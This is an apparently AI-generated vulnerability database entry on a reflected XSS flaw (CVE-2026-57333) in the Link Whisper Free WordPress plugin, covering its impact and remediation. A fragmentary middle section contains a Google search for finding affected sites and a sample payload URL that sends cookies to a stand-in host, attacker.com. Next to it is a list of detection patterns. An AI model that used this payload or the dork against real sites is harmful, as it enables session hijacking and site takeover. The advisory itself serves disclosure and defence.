
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-57333 is an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in the Link Whisper Free WordPress plugin, affecting versions 0.9.4 and earlier. Discovered by researcher João Pedro S Alcântara (Kinorth) and reported on May 8, 2026, it was publicly disclosed on June 29, 2026. The vulnerability carries a CVSS v3.1 base score of 7.1 (High/Medium), assigned by Patchstack (Patchstack, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a reflected XSS variant. The flaw arises from insufficient sanitization of user-supplied input that is reflected back in the plugin's web page output without proper encoding or escaping. Because no authentication is required to trigger the vulnerability, an unauthenticated attacker can craft a malicious URL containing a JavaScript payload; exploitation is completed when a victim (such as a logged-in administrator) clicks the crafted link, causing the script to execute in their browser context (Patchstack, GitHub Advisory).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the victim's browser session, enabling session cookie theft, credential harvesting, unauthorized actions performed on behalf of the victim (such as privilege escalation within WordPress), and redirection to phishing sites. Because the scope is changed (S:C in CVSS), the injected script can affect resources beyond the vulnerable component itself. If a privileged WordPress user (e.g., an administrator) is targeted, the attacker could potentially achieve full site compromise (Patchstack).
inurl:wp-content/plugins/link-whisper).https://target-site.com/wp-admin/[vulnerable-page]?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script>, javascript:, onerror=, or URL-encoded equivalents (e.g., %3Cscript%3E).The primary remediation is to update the Link Whisper Free plugin to version 0.9.5 or later, which contains the fix for this vulnerability (Patchstack). If immediate patching is not possible, consider temporarily deactivating the plugin and implementing Content Security Policy (CSP) headers to restrict unauthorized script execution. Patchstack users benefit from a virtual patch (mitigation rule) that blocks exploitation attempts without requiring a plugin update. WordPress site owners should also educate privileged users to scrutinize links before clicking, particularly those received via email or messages.
Wordfence included CVE-2026-57333 in its weekly WordPress vulnerability report for the period of June 29 – July 5, 2026, highlighting it among other plugin vulnerabilities tracked that week (Wordfence). Patchstack, which coordinated the disclosure through its Active VDP program, noted that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress sites regardless of traffic size (Patchstack). No significant broader media coverage or notable researcher commentary beyond the disclosure parties has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."